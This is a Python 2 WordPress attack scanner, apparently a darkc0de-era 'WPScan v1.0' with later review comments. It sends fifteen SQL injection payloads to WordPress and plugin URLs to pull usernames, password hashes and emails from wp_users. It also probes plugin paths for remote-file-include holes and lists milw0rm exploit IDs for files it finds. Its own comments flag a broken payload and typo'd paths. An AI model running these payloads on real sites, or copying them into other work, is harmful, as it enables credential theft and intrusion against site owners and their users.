Wordpress Scanner
  1. #!/usr/bin/python
  2. #WordPress SQL/RFI/CGI scanner. SQL will check
  3. #for md5's in the source and RFI/CGI will use
  4. #http responses.
  5.  
  6. #http://www.darkc0de.com
  7. #d3hydr8[at]gmail[dot]com
  8.  
import httplib
import re
import socket
import sys
import time
import urllib2
  10.  
#Bad HTTP Responses
# HEAD status codes treated as "path is not there" by the RFI/CGI loops
# below. Every other status -- including 3xx redirects, 403 and 5xx -- is
# reported as a hit, so a site that answers every URL with a redirect
# (e.g. http -> https) will flag every single entry. Read the status that is
# printed next to "[+] Got:" before acting on it.
BAD_RESP = [400,401,404]
  13.  
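def main(path):
    """Send a single HEAD request for ``path`` below the scanned directory.

    Uses the module-level ``host`` ("hostname[:port]/dir/" with the scheme
    already stripped): the part before the first "/" is the server to connect
    to, the rest is the base directory the probe path is appended to.

    Returns ``(status, reason, server_header)`` on any HTTP answer, where
    ``server_header`` is ``None`` when the Server header is absent. Returns
    ``None`` when the request itself fails (connection refused, timeout,
    malformed response); the failure is printed. Callers must test for
    ``None`` before unpacking.
    """
    hostname, base = host.split("/", 1)
    print "[+] Testing:", base + path
    # Plain HTTP only, like the rest of the script. A timeout is set because
    # the original legacy ``httplib.HTTP`` object could hang forever on a
    # host that accepts the connection and never answers.
    conn = httplib.HTTPConnection(hostname, timeout=10)
    try:
        conn.request("HEAD", "/" + base + path, headers={"Host": hostname})
        reply = conn.getresponse()
        return reply.status, reply.reason, reply.getheader("Server")
    except (socket.error, httplib.HTTPException), msg:
        # The original wrote ``except (), msg:`` -- an empty tuple, which
        # catches nothing -- so the intended "report and return None" path
        # never ran and every network error aborted the whole scan.
        print "Error Occurred:", msg
        return None
    finally:
        conn.close()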
  26.  
def timer():
    """Return the current local time as an asctime()-style string.

    ``time.asctime()`` without an argument formats ``time.localtime()``,
    which is exactly what the explicit ``localtime(time())`` dance did.
    """
    return time.asctime()
  30.  
# Banner: one print, two lines of output (identical to printing them separately).
print "\n\t   d3hydr8[at]gmail[dot]com WPScan v1.0\n\t------------------------------------------"
  33.  
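# UNION-based SQL injection payloads, each relative to the scanned directory.
# Every one tries to pull user_login/user_pass out of the users table; the
# response body is then searched for 32-hex MD5 strings by the SQL loop.
# Two transcription errors fixed against the original paste:
#  - a missing comma between the fgallery and wassup entries made Python
#    concatenate the two literals into one nonsensical payload (and the
#    "SQL Loaded" count read 14 instead of 15);
#  - the wassup payload called ``conca(`` instead of MySQL's ``concat(``.
sqls = ["index.php?cat=999%20UNION%20SELECT%20null,CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58)),null,null,null%20FROM%20wp_users/*",
    "index.php?cat=%2527%20UNION%20SELECT%20CONCAT(CHAR(58),user_pass,CHAR(58),user_login,CHAR(58))%20FROM%20wp_users/*",
    # NOTE(review): "/**SELECT**/" is a single MySQL comment, so this payload
    # as transcribed has no SELECT keyword; every other entry uses the
    # "/**/UNION/**/SELECT/**/" form. Left unchanged -- verify against the
    # original advisory before relying on it.
    "index.php?exact=1&sentence=1&s=%b3%27)))/**/AND/**/ID=-1/**/UNION/**SELECT**/1,2,3,4,5,user_pass,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24/**/FROM/**/wp_users%23",
    # NOTE(review): "wp_tbv_users" looks like a site-specific table prefix;
    # the default prefix used everywhere else is "wp_".
    "index?page_id=115&forumaction=showprofile&user=1+union+select+null,concat(user_login,0x2f,user_pass,0x2f,user_email),null,null,null,null,null+from+wp_tbv_users/*",
    "plugins/wp-cal/functions/editevent.php?id=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6%20from%20wp_users--",
    "plugins/fgallery/fim_rss.php?album=-1%20union%20select%201,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4,5,6,7%20from%20wp_users--",
    "plugins/wassup/spy.php?to_date=-1%20group%20by%20id%20union%20select%20null,null,null,concat(0x7c,user_login,0x7c,user_pass,0x7c),null,null,null,null,null,null,null,null%20%20from%20wp_users",
    "wordspew-rss.php?id=-998877/**/UNION/**/SELECT/**/0,1,concat(0x7c,user_login,0x7c,user_pass,0x7c),concat(0x7c,user_login,0x7c,user_pass,0x7c),4,5/**/FROM/**/wp_users",
    "plugins/st_newsletter/shiftthis-preview.php?newsletter=-1/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users",
    "sf-forum?forum=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
    "sf-forum?forum=-99999/**/UNION/**/SELECT/**/0,concat(0x7c,user_login,0x7c,user_pass,0x7c),0,0,0,0,0/**/FROM/**/wp_users/*",
    "forums?forum=1&topic=-99999/**/UNION/**/SELECT/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/FROM/**/wp_users/*",
    "index?page_id=13&album=S@BUN&photo=-333333%2F%2A%2A%2Funion%2F%2A%2A%2Fselect/**/concat(0x7c,user_login,0x7c,user_pass,0x7c)/**/from%2F%2A%2A%2Fwp_users/**WHERE%20admin%201=%201",
    "wp-download.php?dl_id=null/**/union/**/all/**/select/**/concat(user_login,0x3a,user_pass)/**/from/**/wp_users/*",
    "wpSS/ss_load.php?ss_id=1+and+(1=0)+union+select+1,concat(user_login,0x3a,user_pass,0x3a,user_email),3,4+from+wp_users--&display=plain"]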
  49.  
# Remote-file-include checks. Key: path (relative to the scanned directory)
# that the RFI loop probes with a HEAD request. Value: the URL printed as
# "[+] Try:" when the probe does not return a BAD_RESP status. Nothing is
# fetched from the value by this script -- the literal "shell" is a
# placeholder for the remote include URL the tester would substitute.
rfis = {"plugins/Enigma2.php":"index/wp-content/plugins/Enigma2.php?boarddir=shell",  # NOTE(review): value repeats "index/wp-content/" although host already ends in the scanned dir -- verify the resulting URL
    "mygallery/myfunctions/mygallerybrowser.php":"mygallery/myfunctions/mygallerybrowser.php?myPath=shell",
    "plugins/wp-table/js/wptable-button.phpp":"plugins/wp-table/js/wptable-button.phpp?wpPATH=shell",  # NOTE(review): ".phpp" in both key and value looks like a typo for ".php"; as written the probe will almost certainly 404 -- confirm before trusting a miss here
    "plugins/wordtube/wordtube-button.php":"plugins/wordtube/wordtube-button.php?wpPATH=shell",
    "plugins/myflash/myflash-button.php":"plugins/myflash/myflash-button.php?wpPATH=shell",
    "plugins/BackUp/Archive.php":"plugins/BackUp/Archive.php?bkpwp_plugin_path=shell",
    "plugins/BackUp/Archive/Predicate.php":"plugins/BackUp/Archive/Predicate.php?bkpwp_plugin_path=shell",
    "plugins/BackUp/Archive/Writer.php":"plugins/BackUp/Archive/Writer.php?bkpwp_plugin_path=shell",
    "plugins/BackUp/Archive/Reader.php":"plugins/BackUp/Archive/Reader.php?bkpwp_plugin_path=shell",
    "plugins/sniplets/modules/syntax_highlight.php":"plugins/sniplets/modules/syntax_highlight.php?libpath=shell"}
  60.  
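# "CGI" checks: key is the path (relative to the scanned directory) probed
# with a HEAD request; value is the advisory/exploit reference printed as
# "[+] Check:" when the probe does not return a BAD_RESP status. A non-bad
# status only proves the file is reachable, not that the referenced issue
# applies -- several of these are core files present on every install.
# NOTE(review): milw0rm.com has been offline for years; treat the URLs as
# exploit IDs to look up in an exploit archive, not as live links.
# The original literal listed "wp-trackback.php" twice; a dict literal
# silently keeps only the last duplicate, so "CGI Loaded" reported 13 while
# twelve checks actually ran. The duplicate is removed here.
cgis = {"wp-trackback.php":"http://milw0rm.com/exploits/3095",
    "wp-admin/users.php":"http://milw0rm.com/exploits/1059",
    "xmlrpc.php":"http://milw0rm.com/exploits/1077",
    "wp-includes/cache.php":"http://milw0rm.com/exploits/6",
    "plugins/mygallerytmpl.php":"http://milw0rm.com/exploits/3814",
    "wp-admin/admin-ajax.php":"http://milw0rm.com/exploits/3960",
    "wp-app.php":"http://milw0rm.com/exploits/4113",
    "plugins/pictpress/resize.php":"http://milw0rm.com/exploits/4695",
    "plugins/wp-filemanager/ajaxfilemanager/ajaxfilemanager.php":"http://milw0rm.com/exploits/4844",
    "plugins/wp-adserve/adclick.php":"http://milw0rm.com/exploits/5013",
    "wp-admin/admin.php?page=dmsguestbook":"http://milw0rm.com/exploits/5035",
    "plugins/downloads-manager/upload.php":"http://milw0rm.com/exploits/6127"}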
  74.  
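if len(sys.argv) != 2:
    print "\nUsage: ./wpscan.py <site+dir>"
    print "Ex: ./wpscan.py www.site.com/wp-content/\n"
    sys.exit(1)

# Target is "hostname[:port]/path/to/wp-content/" with the scheme removed.
# Only "http://" is stripped: every request in this script goes over plain
# HTTP, so stripping "https://" would silently downgrade the target.
host = sys.argv[1].replace("http://", "", 1)
# The original used rsplit("/", 1)[0], which dropped the last path component
# whenever the argument lacked a trailing slash ("site.com/wp-content" became
# "site.com/") -- defeating the very slash check that followed it. With a
# trailing slash present the result is unchanged.
if not host.endswith("/"):
    host = host + "/"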
  83.    
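print "\n[+] Site:", host
for kind, loaded in (("SQL", sqls), ("RFI", rfis), ("CGI", cgis)):
    print "[+] %s Loaded: %d" % (kind, len(loaded))

# Fingerprint the Server header with a HEAD on the scanned directory.
# main() returns None when the request fails (its error path ends in
# ``pass``), so indexing its result directly would raise TypeError.
probe = main("/")
server = probe[2] if probe is not None else None
print "[+] Server:", server

print "\n[+] Started:", timer()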
  93.  
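print "\n[+] Scanning: SQL\n"
# Whole-token 32-hex match. The original ``"[a-f0-9]"*32`` had no anchors, so
# any 32-character window of a longer hex run (SHA-1s, nonces, asset hashes)
# was reported as an "MD5". Compiled once instead of per payload.
# NOTE(review): WordPress has stored phpass hashes ("$P$...") rather than raw
# MD5 since 2.5, so on anything remotely current this check stays silent even
# when an injection succeeds -- a negative here is not a clean result.
md5_re = re.compile(r"\b[a-f0-9]{32}\b")
for sql in sqls:
    time.sleep(2) #Change this if needed
    payload = sql.replace("\n", "")
    print "[+] Trying:", payload
    try:
        source = urllib2.urlopen("http://" + host + payload).read()
    except urllib2.URLError:
        # HTTPError is a subclass of URLError; catching the base class also
        # covers connection failures, which previously aborted the whole scan.
        continue
    md5s = md5_re.findall(source)
    if md5s:
        print "[!]", host + payload
        for md5 in md5s:
            print "\n\t[+]MD5:", md5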
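print "\n[+] Scanning: RFI\n"
for rfi, shell in rfis.items():
    result = main(rfi)
    if result is None:
        # main() returns None after printing the error when the request
        # itself failed; unpacking it would raise TypeError.
        continue
    resp, reason, _ = result
    # Anything outside BAD_RESP (400/401/404) is a "hit" -- that includes 3xx
    # redirects, 403 and 5xx, so check the printed status before following
    # the "Try:" URL. The URL is only printed, never requested; "shell" in
    # it is a placeholder for the include URL the tester would supply.
    if resp not in BAD_RESP:
        print "\t[+] Got:",resp, reason
        print "\t[+] Try:",host+shell
    else:
        print "\t[-] Got:",resp, reason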
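print "\n[+] Scanning: CGI\n"
for cgi, expl in cgis.items():
    result = main(cgi)
    if result is None:
        # main() returns None after printing the error when the request
        # itself failed; unpacking it would raise TypeError.
        continue
    resp, reason, _ = result
    if resp not in BAD_RESP:
        # A non-BAD_RESP status only shows the file is reachable. Entries such
        # as xmlrpc.php or wp-admin/admin-ajax.php are core files that exist on
        # every install, so the referenced exploit still has to be matched
        # against the running WordPress/plugin version by hand.
        print "\t[+] Got:",resp, reason
        print "\t[+] Check:",expl
    else:
        print "\t[-] Got:",resp, reason
print "\n[-] Done\n"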